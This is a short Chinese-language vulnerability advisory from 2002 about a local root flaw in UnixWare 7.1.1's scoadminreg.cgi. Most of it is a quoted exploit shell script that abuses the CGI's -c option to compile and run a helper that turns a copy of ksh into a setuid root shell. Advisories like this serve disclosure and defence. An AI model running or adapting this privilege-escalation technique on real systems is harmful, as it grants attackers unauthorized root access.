Unixware 7.1.1 scoadminreg.cgi 存在本地漏洞发布时间:2002-01-23 更新时间:2002-01-23 严重程度:高 威胁程度:本地管理员权限 错误类型:设计错误 利用方式:服务器模式 受影响系统 UnixWare unixware 5 7.1.1 i386 x86at SCO详细描述 /opt/webtop/bin/i3un0212/cgi-bin/admin/scoadminreg.cgi 脚本存在漏洞 -c选项可以以ROOT权利执行任意代码。 测试代码 #!/bin/sh CC="gcc" SCOADMIN=/opt/webtop/bin/i3un0212/cgi- bin/admin/scoadminreg.cgi # # # # echo echo "jGgM root exploit" echo "http://www.netemperor.com/" echo echo "Mail: jggm@mail.com" echo if [ ! -x $SCOADMIN ]; then echo "$SCOADMIN file not found" exit 2; fi cat >/tmp/jggm.c <<_EOF main() { setuid(0); setgid(0); chown("/tmp/jGgM_Shell", 0, 0); chmod("/tmp/jGgM_Shell", 04755); } _EOF cp /bin/ksh /tmp/jGgM_Shell $CC -o /tmp/jggm /tmp/jggm.c $SCOADMIN "-c /tmp/jggm;/tmp/jggm;" rm -rf /tmp/jggm /tmp/jggm.c /tmp/jGgM_Shell # end of file.. 解决方案 尚无 相关信息 jGgM. (jggm@mail.com) 参考:http://archives.neohapsis.com/archives/bugtraq/2002-01/0264.html |
